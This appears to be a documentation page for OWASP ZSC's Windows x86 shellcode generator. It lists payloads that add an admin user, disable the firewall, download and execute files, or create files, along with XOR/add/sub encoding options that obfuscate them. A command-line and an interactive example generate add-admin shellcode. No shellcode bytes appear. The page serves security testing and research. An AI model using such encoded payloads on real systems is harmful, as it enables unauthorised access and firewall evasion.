Windows Shellcode

This module has been created by Pratik Patel during his internship through the Google Summer of Code 2016. This module is also in development for x86, please if you encounter any issues, submit them here:https://github.com/zscproject/OWASP-ZSC/issues

Command line Windows Shellcode

There are many payloads avaible ofn the fly for generating windows shellcode with encoding or none:

The main windows shellcode payloads are available for windows

add_admin:

Add an admin user.Must provide 2 parameters 'username' and 'password'

download_exec:

Download an executable file. You must provide 2 Parameters: 'url' and 'filename'

exec:file_to_execute

Generate shellcode from binary/executable. Must provide as parameter the location/path of the file

download_tofile('url','filename')

Withthis payload you can generate a shellcode to download a file. Requires 2 parameters 'url and 'filename'

[!] add_admin('username','password')
[+] windows_x86/add_admin/none
[+] windows_x86/add_admin/xor_random
[+] windows_x86/add_admin/add_random
[+] windows_x86/add_admin/sub_random
[+] windows_x86/add_admin/xor_yourvalue

[!] download_exec('url','filename')
[+] windows_x86/download_exec/none
[+] windows_x86/download_exec/xor_random
[+] windows_x86/download_exec/add_random
[+] windows_x86/download_exec/sub_random
[+] windows_x86/download_exec/xor_yourvalue

[!] exec('file_to_execute')
[+] windows_x86/exec/none
[+] windows_x86/exec/xor_random
[+] windows_x86/exec/add_random
[+] windows_x86/exec/sub_random
[+] windows_x86/exec/xor_yourvalue

[!] disable_firewall()
[+] windows_x86/disable_firewall/none
[+] windows_x86/disable_firewall/xor_random
[+] windows_x86/disable_firewall/add_random
[+] windows_x86/disable_firewall/sub_random
[+] windows_x86/disable_firewall/xor_yourvalue

[!] download_tofile('url','filename')
[+] windows_x86/download_tofile/none
[+] windows_x86/download_tofile/xor_random
[+] windows_x86/download_tofile/add_random
[+] windows_x86/download_tofile/sub_random
[+] windows_x86/download_tofile/xor_yourvalue

[!] create_file('filename','content')
[+] windows_x86/create_file/none
[+] windows_x86/create_file/xor_random
[+] windows_x86/create_file/add_random
[+] windows_x86/create_file/sub_random
[+] windows_x86/create_file/xor_yourvalue

[!] dir_create('directory_to_create')
[+] windows_x86/dir_create/none
[+] windows_x86/dir_create/xor_random
[+] windows_x86/dir_create/add_random
[+] windows_x86/dir_create/sub_random
[+] windows_x86/dir_create/xor_yourvalue

Options interactive shell

Windows shellcode generator has the following features available:

zsc> shellcode
zsc/shellcode> generate
zsc/shellcode/generate> 
linux_x86    osx_x86      windows_x86  
zsc/shellcode/generate> windows_x86
zsc/shellcode/generate/windows_x86> 
add_admin         dir_create        download_exec     exec
create_file       disable_firewall  download_tofile

Generating shellcode for windows - example

This module creates on the flight shellcode to add an admin in a windows x86 system. To use it is very easy

using a command line: zsc -p windows_x86/add_admin/none -i "mary~~~password"

or using an interactive shellcode:

zsc> shellcode
zsc/shellcode> generate
zsc/shellcode/generate> 
linux_x86    osx_x86      windows_x86  
zsc/shellcode/generate> windows_x86
zsc/shellcode/generate/windows_x86> 
add_admin         dir_create        download_exec     exec
create_file       disable_firewall  download_tofile   
zsc/shellcode/generate/windows_x86> add_admin
zsc/shellcode/generate/windows_x86/add_admin> username&&password
username> jack
password> Mate1!

[+] username set to "jack"
[+] password set to "Mate1!"

[+] none
[+] xor_random
[+] add_random
[+] sub_random
[+] xor_yourvalue


[+] enter encode type
zsc/shellcode/generate/windows_x86/add_admin/encode_type>

As you can see, there are 4 options to encode this shellcode using, or just use 'none' if you wish not to encode

  • [+] xor_random
  • [+] add_random
  • [+] sub_random
  • [+] xor_yourvalue

results matching ""

    No results matching ""